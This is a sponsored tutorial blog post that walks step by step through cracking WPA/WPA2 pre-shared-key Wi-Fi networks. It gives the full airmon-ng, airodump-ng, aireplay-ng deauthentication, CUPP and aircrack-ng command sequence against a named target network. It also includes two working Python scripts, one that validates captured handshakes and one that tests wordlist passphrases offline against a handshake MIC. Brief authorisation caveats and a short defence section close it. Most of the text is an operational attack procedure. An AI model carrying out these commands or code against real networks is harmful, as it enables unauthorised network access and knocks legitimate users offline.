
How to Hack a Wi-Fi Network: WPA/WPA2 PSK Attack Methodology



Wi-Fi hacking is often synonymous with WPA/WPA2 PSK attacks, one of the most common ways attackers compromise wireless networks. These attacks exploit weak pre-shared keys (passphrases): the attacker captures the 4-way handshake that a client and the access point exchange when the client authenticates, then attacks that capture offline with a dictionary or brute-force attack, with no further contact with the network required. The methodology has several steps: identifying the target network, capturing its traffic, forcing an already-connected device to reconnect (a deauthentication attack) so that a handshake occurs, and finally cracking the captured handshake with tools like aircrack-ng. Wordlist generators such as CUPP and rsmangler let attackers tailor the dictionary to the specific target. This guide walks you through the entire process, detailing the tools, techniques, and commands used, and ends with how to secure your own network against such attacks.

Understanding how these attacks work is important not just for penetration testers and ethical hackers but for anyone looking to improve their cybersecurity defences. By gaining insight into how attackers operate, you can better protect your own network from vulnerabilities. Now, let's dive into the detailed steps for executing a WPA/WPA2 PSK attack.

Step-by-Step: WPA/WPA2 PSK Attack Methodology

Step 1: Checking Your Wi-Fi Adapter

To start, you need a Wi-Fi adapter that supports monitor mode and packet injection. Without monitor mode you cannot capture frames that are not addressed to you, and without injection you cannot send the deauthentication frames used later. First, check that the adapter is present and recognised as a wireless interface by running the iwconfig command.

iwconfig

This command lists the wireless interfaces. Look for your adapter (often listed as wlan0) and make sure it is recognised. iwconfig only tells you that the interface exists; whether the driver supports monitor mode is confirmed when airmon-ng switches it over in Step 3, and injection support can be confirmed with aireplay-ng's injection test (-9).

Step 2: Kill Interfering Processes

To make sure the adapter can be put into monitor mode, stop the processes that would otherwise keep reconfiguring it, most notably NetworkManager and wpa_supplicant. Skipping this step is the usual cause of channel-hopping errors and captures that silently stop.

sudo airmon-ng check kill


This command terminates the interfering processes (NetworkManager, wpa_supplicant, DHCP clients and similar). It also drops any Wi-Fi connection the machine currently has; Step 10 restores it.

Step 3: Enable Monitor Mode

Once the processes have been stopped, enable monitor mode on your Wi-Fi adapter. In monitor mode the card passes up every 802.11 frame it hears on the channel it is tuned to, not just the frames addressed to it, which is what makes capturing another network's handshake possible.

sudo airmon-ng start wlan0


This puts the adapter into monitor mode and, with current airmon-ng versions, creates a new interface named wlan0mon, which the remaining commands use. If airmon-ng reports that monitor mode is unsupported, the adapter or driver is not suitable and none of the later steps will work.

Step 4: Scan for Available Wi-Fi Networks

With your adapter in monitor mode, the next step is to scan for nearby Wi-Fi networks and pick your target. airodump-ng hops across channels and lists every network it hears along with its channel, signal strength and security settings.

sudo airodump-ng wlan0mon



Take note of the target's BSSID (the access point's MAC address), its channel (the CH column), its ESSID (network name), and that the ENC/CIPHER/AUTH columns read WPA2/CCMP/PSK: this attack applies to pre-shared-key networks only, not to WPA2-Enterprise (802.1X) or WPA3. The lower half of the output lists connected clients (STATION) per BSSID; you will need at least one connected client, and its MAC address, for the deauthentication step.

Step 5: Capture Traffic from the Target Network

Now that you've identified your target network, focus the traffic capture on that specific network. This will help you capture the 4-way handshake during the authentication process when a device connects to the network.

sudo airodump-ng wlan0mon --channel 3 --essid "LESS SECURE WIFI" \
--bssid 5C:A6:E6:[REDACTED] --band bg -w less-secure


In this command:
  • --channel 3 locks airodump-ng on channel 3 instead of hopping, so none of the target's frames are missed.
  • --essid "LESS SECURE WIFI" filters the display to the target network name.
  • --bssid 5C:A6:E6:[REDACTED] filters to the MAC address of the target access point.
  • --band bg restricts scanning to the 2.4 GHz band (redundant once a channel is fixed, but harmless).
  • -w less-secure writes the capture under the prefix less-secure: the frames go to less-secure-01.cap, with .csv, .kismet.csv, .kismet.netxml and .log.csv summaries beside it.
Leave this command running in its own terminal. The goal is to capture the 4-way handshake when a device connects, or reconnects, to the network; when that happens, airodump-ng shows "WPA handshake: <BSSID>" in the top-right corner of its output. To expedite this, you can force an already-connected device to reconnect with a deauthentication attack.

Step 6: Deauthenticating Clients

A deauthentication attack sends forged deauthentication management frames that tell a client it has been disconnected from the network. The client then reconnects and performs a fresh 4-way handshake with the access point, which the airodump-ng session from Step 5 captures. Run this in a second terminal:

sudo aireplay-ng -0 1 -a 5C:A6:E6:[REDACTED] -c 8A:97:20:[REDACTED] wlan0mon

In this command:
  • -0 1 selects the deauthentication attack and sends one round of it (aireplay-ng transmits a burst of 64 directed deauthentication frames per round; a count of 0 loops indefinitely).
  • -a 5C:A6:E6:[REDACTED] is the BSSID of the target AP (router).
  • -c 8A:97:20:[REDACTED] is the MAC address of the client to disconnect, taken from the STATION column of the airodump-ng output. Without -c the frames are broadcast, which many clients ignore, so targeting a specific client is more reliable.
If the network does not use Management Frame Protection (MFP, IEEE 802.11w), the client will reconnect and generate the 4-way handshake. If MFP is enabled, clients discard unauthenticated deauthentication frames and the attack has no effect; you then have to wait for a client to connect or reconnect naturally. Deauthentication knocks real users off the network, so only send it against networks you are authorised to test, and send as few rounds as needed.

Step 7: Confirm Handshake Capture

After the client reconnects, you should have the 4-way handshake on disk. The .cap file is the one that matters from here on:

ls -l less-secure-01.cap


A non-empty file only shows that airodump-ng was writing; it does not prove that the handshake was captured. Two checks are worth doing: the airodump-ng header should read "WPA handshake: 5C:A6:E6:[REDACTED]", and aircrack-ng, when run on the capture file without a wordlist, lists each network it finds together with the number of handshakes. For cracking, message 2 of the handshake (the client's SNonce and MIC) is mandatory, together with the AP's ANonce from message 1 or message 3 of the same exchange.
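A scripted version of that check, added here as an example and not code from the original post or from the aircrack-ng project: it reads the .cap file that airodump-ng writes (a classic pcap container holding raw 802.11 frames, link type 105), pulls out the EAPOL-Key frames belonging to one BSSID, and reports which handshake messages were seen for each client and whether the combination is crackable. Only the standard library is used. The capture at the bottom is constructed inside the script with placeholder MAC addresses and zeroed nonces and MICs, purely to exercise the parser; run the script with a real capture file and BSSID as arguments instead.

```python
"""Check an airodump-ng .cap for a usable WPA/WPA2 4-way handshake (added example, stdlib only)."""
import struct
import sys

LINKTYPE_IEEE802_11 = 105                             # airodump-ng writes raw 802.11 frames
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")    # LLC/SNAP header for EtherType 0x888E


def pcap_records(data):
    """Yield each frame of a classic pcap file; refuse pcapng and non-802.11 link types."""
    magic, = struct.unpack_from("<I", data, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype, = struct.unpack_from(endian + "I", data, 20)
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError(f"link type {linktype}: expected 105 (raw 802.11)")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def eapol_key_frame(frame):
    """Return (bssid, client, eapol) for an unencrypted data frame carrying EAPOL-Key, else None."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 3 != 2 or fc1 & 0x40:            # not a Data frame, or Protected bit set
        return None
    hdr = 26 if fc0 & 0x80 else 24                    # QoS Data subtypes add a 2-byte QoS Control field
    addr1, addr2 = frame[4:10], frame[10:16]
    if fc1 & 0x01 and not fc1 & 0x02:                 # ToDS: client -> AP, addr1 is the BSSID
        bssid, client = addr1, addr2
    elif fc1 & 0x02 and not fc1 & 0x01:               # FromDS: AP -> client, addr2 is the BSSID
        bssid, client = addr2, addr1
    else:
        return None
    if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL:
        return None
    eapol = frame[hdr + 8:]
    if len(eapol) < 99 or eapol[1] != 3:              # type 3 = EAPOL-Key; 99 = header + fixed descriptor fields
        return None
    length, = struct.unpack_from(">H", eapol, 2)
    return bssid, client, eapol[:4 + length]          # trim any trailing FCS or padding


def message_number(eapol):
    """Map the Key Information flags (Ack, MIC, Secure) to pairwise handshake message 1..4, or None."""
    key_info, = struct.unpack_from(">H", eapol, 5)
    if not key_info & 0x0008:                         # Key Type 0 = group-key handshake, not the 4-way
        return None
    ack, mic, secure = key_info & 0x0080, key_info & 0x0100, key_info & 0x0200
    if ack:
        return 3 if mic else 1                        # AP -> client: M1 carries the ANonce, M3 repeats it
    if mic:
        return 4 if secure else 2                     # client -> AP: M2 carries SNonce + MIC (the crackable one)
    return None


def handshake_status(cap_bytes, bssid):
    """Return {client: {message_number: replay_counter}} for EAPOL-Key frames of this BSSID."""
    seen = {}
    for frame in pcap_records(cap_bytes):
        hit = eapol_key_frame(frame)
        if hit is None or hit[0] != bssid:
            continue
        msg = message_number(hit[2])
        if msg is not None:
            replay_counter, = struct.unpack_from(">Q", hit[2], 9)
            seen.setdefault(hit[1], {})[msg] = replay_counter
    return seen


def crackable(msgs):
    """M2 is mandatory; the ANonce must come from the M1 before it (same counter) or the M3 after it (counter + 1)."""
    return 2 in msgs and (msgs.get(1) == msgs[2] or msgs.get(3) == msgs[2] + 1)


# Constructed sample capture: placeholder MACs, zeroed nonces and MICs; not data from the post.
AP, STA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")


def _frame(bssid, client, key_info, replay, from_ap):
    fc = b"\x08" + (b"\x02" if from_ap else b"\x01")                   # Data frame, FromDS or ToDS
    addrs = client + bssid + bssid if from_ap else bssid + client + bssid
    body = struct.pack(">BHHQ32s16sQQ16sH", 2, key_info, 16, replay, b"\0" * 32, b"\0" * 16, 0, 0, b"\0" * 16, 0)
    return fc + b"\0\0" + addrs + b"\0\0" + LLC_SNAP_EAPOL + struct.pack(">BBH", 2, 3, len(body)) + body


def _pcap(frames):
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    return header + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)


SAMPLE_CAP = _pcap([_frame(AP, STA, 0x008A, 1, True),      # M1
                    _frame(AP, STA, 0x010A, 1, False),     # M2
                    _frame(AP, STA, 0x13CA, 2, True),      # M3
                    _frame(AP, STA, 0x030A, 2, False)])    # M4

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CAP
    bssid = bytes.fromhex(sys.argv[2].replace(":", "")) if len(sys.argv) > 2 else AP
    for client, msgs in handshake_status(data, bssid).items():
        print(client.hex(":"), sorted(msgs), "crackable" if crackable(msgs) else "incomplete")
```

Run it as `python3 check_handshake.py less-secure-01.cap 5C:A6:E6:xx:xx:xx` against your own capture. The replay-counter check matters in practice: a capture that contains an M1 from one reconnection and an M2 from a later one looks complete but produces a MIC that no passphrase will ever satisfy, so the tool flags it as incomplete rather than letting you burn hours on a wordlist.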

Step 8: Create a Custom Wordlist Using CUPP

To crack the Wi-Fi password you need a wordlist. A common tactic is to use CUPP (Common User Passwords Profiler) to generate a customised wordlist from words tied to the target: the network name, the organisation's domain, product names and the like.
Start by creating a small seed list:

cat wordlist.txt

less secure
less-secure.com
wifi
password
secret


Next, run CUPP in its "improve an existing dictionary" mode to expand this seed list:

cupp -w wordlist.txt


CUPP prompts for a few options (appending numbers, adding special characters, leet substitutions, concatenating words) and writes the expanded list to wordlist.txt.cupp.txt. Keep in mind that a WPA/WPA2 pre-shared key is between 8 and 63 characters long, so a seed word like wifi can only match once CUPP has grown it; aircrack-ng skips candidates outside that range.

Step 9: Crack the Password

With the handshake captured and your custom wordlist ready, you can now attempt to crack the password using aircrack-ng.

aircrack-ng -w wordlist.txt.cupp.txt -e "LESS SECURE WIFI" \
-b 5C:A6:E6:[REDACTED] less-secure-01.cap


In this command:
  • -w wordlist.txt.cupp.txt specifies the custom wordlist generated by CUPP.
  • -e "LESS SECURE WIFI" is the network's ESSID (name).
  • -b 5C:A6:E6:[REDACTED] is the BSSID (MAC address) of the target access point.
  • less-secure-01.cap is the capture file containing the handshake.
If the password is present in the wordlist, aircrack-ng prints it as KEY FOUND!. If it is not, re-running changes nothing: the only remedy is a better wordlist. aircrack-ng is CPU-bound (each candidate costs a 4096-iteration PBKDF2 derivation), so for large wordlists the usual route is to convert the capture with hcxpcapngtool and run hashcat in mode 22000 on a GPU.
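To see what aircrack-ng actually does with each wordlist entry, here is the verification step written out in Python, added as an example and not code from the original post or from aircrack-ng: PBKDF2 turns the candidate passphrase and the SSID into the PMK, a PRF derives the PTK whose first 16 bytes (the KCK) key the MIC, and an HMAC over message 2 of the handshake is compared with the MIC the client sent. The handshake below is constructed (placeholder MACs, fixed nonces, a standard WPA2-PSK RSN element) with a known passphrase so that the match can be checked; the PMK test vector is the one from the IEEE 802.11 standard.

```python
"""Offline WPA2-PSK candidate verification: the check aircrack-ng runs per wordlist entry (added example)."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). This is the expensive step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 over the sorted MACs and nonces; the first 16 bytes are the KCK that keys the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def eapol_mic(kck, eapol, version):
    """Key MIC over the whole EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed."""
    zeroed = eapol[:81] + b"\0" * 16 + eapol[97:]
    if version == 1:                                 # WPA (TKIP): HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                 # WPA2 (CCMP): HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("key descriptor version 3 (AES-128-CMAC, SHA-256 AKMs) is not handled here")


def crack(ssid, ap_mac, sta_mac, anonce, m2_eapol, candidates):
    """Return the first candidate whose MIC matches message 2, or None.

    Candidates outside 8..63 characters are skipped: they cannot be WPA-PSK
    passphrases, and aircrack-ng discards them as well.
    """
    key_info, = struct.unpack_from(">H", m2_eapol, 5)
    version = key_info & 0x0007
    snonce = m2_eapol[17:49]
    captured_mic = m2_eapol[81:97]
    for cand in candidates:
        cand = cand.rstrip("\n")
        if not 8 <= len(cand) <= 63:
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, m2_eapol, version), captured_mic):
            return cand
    return None


# Constructed handshake: placeholder MACs and nonces, NOT the post's capture.
SSID = "LESS SECURE WIFI"
AP_MAC, STA_MAC = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # WPA2-PSK / CCMP RSN element


def build_m2(passphrase):
    """Build message 2 the way a supplicant would, so there is a genuine MIC to verify against."""
    body = struct.pack(">BHHQ32s16sQQ16sH", 2, 0x010A, 16, 1, SNONCE, b"\0" * 16, 0, 0, b"\0" * 16, len(RSN_IE))
    eapol = struct.pack(">BBH", 2, 3, len(body) + len(RSN_IE)) + body + RSN_IE
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol[:81] + eapol_mic(kck, eapol, 2) + eapol[97:]


if __name__ == "__main__":
    m2 = build_m2("less-secure.com")
    wordlist = ["wifi", "secret", "password", "less secure", "less-secure.com"]
    print("recovered:", crack(SSID, AP_MAC, STA_MAC, ANONCE, m2, wordlist))
```

This is the whole offline attack: everything after the capture is local computation, which is why the capture alone is enough and why the per-candidate cost of PBKDF2 (4096 HMAC-SHA1 iterations, salted with the SSID) is the only thing slowing an attacker down. Note that the SSID being the salt is also why precomputed tables exist for common network names.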

Step 10: Stop Monitor Mode and Restart Network Services

Once you're done, return the adapter to managed mode and restart the services that airmon-ng check kill stopped earlier.

1. Stop monitor mode:
sudo airmon-ng stop wlan0mon


2. Restart NetworkManager:
sudo systemctl restart NetworkManager


This removes the wlan0mon interface, restores wlan0, and restarts NetworkManager, which in turn starts wpa_supplicant and reconnects the machine to its usual network.

How to Protect Your Network from WPA/WPA2 PSK Attacks

  1. Use WPA3: WPA3-Personal replaces the PSK handshake with SAE (Simultaneous Authentication of Equals), so capturing the exchange no longer yields material that can be cracked offline; every password guess requires a live exchange with the access point.
  2. Strong, Unique Passphrases: WPA2 allows passphrases of 8 to 63 characters. Use a long, random one (20 or more characters) that appears in no wordlist and is not derived from the network name, the organisation, or anything a profiler like CUPP would guess. Because the SSID is the salt of the key derivation, also avoid default or common SSIDs, for which precomputed tables exist.
  3. Enable MFP (Management Frame Protection, IEEE 802.11w): with it enabled, clients discard forged deauthentication frames. It is mandatory in WPA3 and optional in WPA2; turn it on if your clients support it.


This Article Was Sponsored By: TwelveSec







